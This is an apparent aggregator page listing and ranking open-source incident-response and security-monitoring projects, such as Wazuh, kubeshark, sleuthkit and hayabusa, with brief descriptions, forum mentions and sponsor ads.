Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality. Learn more →
Top 23 incident-response Open-Source Projects
-
kubeshark
The API traffic analyzer for Kubernetes providing real-time K8s protocol-level visibility, capturing and monitoring all traffic and payloads going in, out and across containers, pods, nodes and clusters. Inspired by Wireshark, purposely built for Kubernetes
-
InfluxDB
Power Real-Time Data Analytics at Scale. Get real-time insights from all types of time series data with InfluxDB. Ingest, query, and analyze billions of data points in real-time with unbounded cardinality.
-
Wazuh
Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
-
howtheysre
A curated collection of publicly available resources on how technology and tech-savvy organizations around the world practice Site Reliability Engineering (SRE)
-
my-arsenal-of-aws-security-tools
List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
-
WorkOS
The modern identity platform for B2B SaaS. The APIs are flexible and easy-to-use, supporting authentication, user identity, and complex enterprise features like SSO and SCIM provisioning.
-
sleuthkit
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence.
-
hayabusa
Hayabusa (隼) is a sigma-based threat hunting and fast forensics timeline generator for Windows event logs.
-
PersistenceSniper
Powershell module that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. Official Twitter/X account @PersistSniper. Made with ❤️ by @last0x00 and @dottor_morte
-
Bashfuscator
A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team.
-
Incident-Playbook
GOAL: Incident Response Playbooks Mapped to MITRE Attack Tactics and Techniques. [Contributors Friendly]
-
beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)
-
asn
ASN / RPKI validity / BGP stats / IPv4v6 / Prefix / URL / ASPath / Organization / IP reputation / IP geolocation / IP fingerprinting / Network recon / lookup API server / Web traceroute server
-
SaaSHub
SaaSHub - Software Alternatives and Reviews. SaaSHub helps you find the best software and product alternatives
Project mention: 24 GitHub repos with 372M views that you can't miss out as a software engineer | dev.to | 2024-01-25A curated list of Site Reliability and Production Engineering resources: https://github.com/dastergon/awesome-sre
Project mention: Show HN: Alaz: Open-Source, Self-Hosted, eBPF-Based K8s Monitoring | news.ycombinator.com | 2023-09-06The one similar product I had come across is Kubeshark (https://github.com/kubeshark/kubeshark). But admittedly the eBPF way seems more performant theoretically (given you can afford to have a modern-enough kernel). I'm really excited to see how this project develops out.
The eBPF-mode of innovation is pretty exciting, truly a fresh lens to building software. I'm also following Akita Software - the company building an eBPF paradigm of monitoring.
There is currently no feature for excluding specific SCA rules however this feature has been requested here and would be added to the roadmap for future releases.
Project mention: 5 GitHub Projects to Help You Become a Better DevOps Engineer ⚡ | dev.to | 2023-06-231. How they SRE
Project mention: Show HN: OneUptime – open-source Datadog Alternative | news.ycombinator.com | 2024-04-02
Project mention: What are your go-to tools for task management and/or case work? | /r/cybersecurity | 2023-12-09I had a quick test with the hive looks pretty nice. https://thehive-project.org/
Project mention: How to carry out mass Digital Forensic Collections using open source tools? | /r/computerforensics | 2023-12-06
Project mention: Are there any GPU-powered disk forensics libraries/frameworks or programs? | /r/CUDA | 2023-09-28
Project mention: Hayabusa: Sigma-based forensics timeline generator for Windows event logs | news.ycombinator.com | 2024-04-24
Here are lots of templates from GitHub to use for your post-mortem meeting.
Alternative: asn
incident-response related posts
- Vector: A high-performance observability data pipeline
- Show HN: OneUptime – Self Hosted Open Source Datadog Alternative
- It's not always DNS – unless it is
- Show HN: OneUptime – open-source Incident.io,StatusPage.io,PagerDuty alternative
- OneUptime: Open Source StatusPage.io + UptimeRobot + PagerDuty alternative that you can self-host on Kubernetes and Helm
- PagerDuty Postmortem Handbook
- How to carry out mass Digital Forensic Collections using open source tools?
-
A note from our sponsor - InfluxDB
www.influxdata.com | 24 Apr 2024
Index
What are some of the best open-source incident-response projects? This list will help you:
Project | Stars | |
---|---|---|
1 | awesome-sre | 11,484 |
2 | kubeshark | 10,541 |
3 | Wazuh | 9,108 |
4 | howtheysre | 8,918 |
5 | my-arsenal-of-aws-security-tools | 8,692 |
6 | awesome-incident-response | 7,114 |
7 | oneuptime | 4,052 |
8 | awesome-threat-detection | 3,325 |
9 | TheHive | 3,166 |
10 | IntelOwl | 3,103 |
11 | velociraptor | 2,654 |
12 | sleuthkit | 2,469 |
13 | volatility3 | 2,207 |
14 | hayabusa | 1,922 |
15 | cyberchef-recipes | 1,881 |
16 | PersistenceSniper | 1,799 |
17 | Bashfuscator | 1,502 |
18 | response | 1,494 |
19 | Incident-Playbook | 1,329 |
20 | beagle | 1,250 |
21 | Cortex | 1,249 |
22 | postmortem-templates | 1,225 |
23 | asn | 1,173 |
Sponsored